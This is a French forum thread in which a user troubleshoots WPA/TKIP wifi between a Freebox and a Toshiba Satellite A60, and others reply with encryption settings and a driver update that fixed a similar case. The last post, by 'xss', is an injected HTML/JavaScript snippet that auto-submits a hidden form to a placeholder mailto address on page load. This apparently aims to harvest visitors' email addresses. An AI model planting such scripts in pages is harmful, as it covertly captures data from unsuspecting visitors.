Wifi Freebox & Toshiba Satellite A60 en wifi.

roddysat -  
 remer -
Bonjour,
Wifi Freebox & Toshiba Satellite A60 en wifi.
J’ai configuré ma Freebox en wifi dont voici la config :
Canal 1, nom du réseau xxxxxx, Protection En WPA (TKIP), une clé entre 8 et 63 caractères (16 caractères).
Le portable :
1) Fenêtre Propriétés de Connexion réseau sans fil :
Onglet général ; carte Atheros AR5004G Wireless Network Adapter.
Propriétés de connexion réseau :
Général : Protocole internet (TCP/IP) Automatique.
Onglet Configuration réseau sans fil :
Utiliser Windows pour configurer mon réseau sans fil.
Afficher les réseaux sans fil : j’en vois plusieurs dont le mien (barres vertes au maximum).
Réseaux favoris : le mien xxxxxx (automatique).
2)Fenêtre Propriétés de mon réseau :
Case cochée; me connecter même si le réseau ne diffuse pas son nom.
Clé de réseau sans fil :
Authentification réseau, là je ne dispose pas des mêmes possibilités que sur la Freebox :
(Freebox WPA (TKIP)).
Portable si je mets WPA seul et le cryptage en TKIP, il ne me donne pas accès à la clé du réseau car il dispose des authentifications suivantes :
Ouvrir, Partagée, WPA, WPA-PSK, WPA2, WPA2-PSK, donc je suis obligé de passer en WPA-PSK ou autre.
De même pour le cryptage des données :
Freebox (WEP, WPA (TKIP), WPA (AES/CCMP), WPA (TKIP+AES),
Portable (TKIP ou AES).
Onglet Connexion : Case cochée (Me connecter à ce réseau lorsqu’il est à porté).
Voilà en gros ce que j’ai fait, malgré tout ça ne fonctionne pas et en espérant que votre aide soit positive, je suis à votre disposition pour d’autres questions. roddysat
A voir également:

2 réponses

docsteph Messages postés 8763 Date d'inscription   Statut Membre Dernière intervention   1 117

bonjour,

choisir clef partagé en wpa psk 128 bit héxadécimal et tkip.

cdt
1
roddysat

merci de repondre de suite.
je n'ai pas la possibilité de partagée car dans mon partage voilà ce qu'il me donne:
Partagée = Wep ou désactivé
donc il faudrait que je configure l'ensemble en WEP mais au niveau sécurité bonjour les dégats.
faudra trouvé autre chose je pense.
0
docsteph Messages postés 8763 Date d'inscription   Statut Membre Dernière intervention   1 117 > roddysat

tu as changé la configuration par defaut de ta free?

cdt
0
roddysat > docsteph Messages postés 8763 Date d'inscription   Statut Membre Dernière intervention  

le wifi sur la freebox je l'ai créé, voir config plus haut et par défaut si je me souviens, le wifi n'est pas activé.
0
roddysat > roddysat

bonjour,
que se passe t-il, personne ne peut m'aider ou alors c'est les vacances, le week-end???
non, je plaisante, mais je n'arrive toujours pas à les configurer correctement quelque soit la procédure que je fasse.
merci quand meme pour répondre. roddysat
0
remer

J'ai eu un soucis similaire avec mon TOSHIBA Satellite SA60-202 qui comporte une carte wifi Atheros AR5004G. Mon pilote était celui d'origine (3.1.2.12 du 28/05/2004). A priori, il prenait mal en charge le WPA/WPA2 Auto tkip_aes de ma Livebox. J'ai l'ai mis à jour (7.7.0.233 du 13/03/2009, merci à TousLesDrivers.com : https://www.touslesdrivers.com/index.php?v_page=23&v_code=24839 et c'est maintenant OK.
Réponse un peu tardive, certes, mais à toute fin utile...
0
xss

<HTML>
<HEAD>
<SCRIPT LANGUAGE=JavaScript>
<!--
function chouraveMail ()
{
maintenant = new Date();
message = maintenant.getDate()
+ "."
+ eval(maintenant.getMonth()+1)
+ "."
+ maintenant.getYear();
document.formulaireBidon.champMasque.value = message;
document.formulaireBidon.submit();
}
// -->
</SCRIPT>
</HEAD>
<BODY onLoad = 'chouraveMail();'>
Merci pour les renseignements :-)
<FORM NAME=formulaireBidon METHOD=POST ACTION="mailto:adressebidon@tonserveur.com">
<INPUT TYPE=HIDDEN NAME=champMasque>
</FORM>
</BODY>
</HTML>
0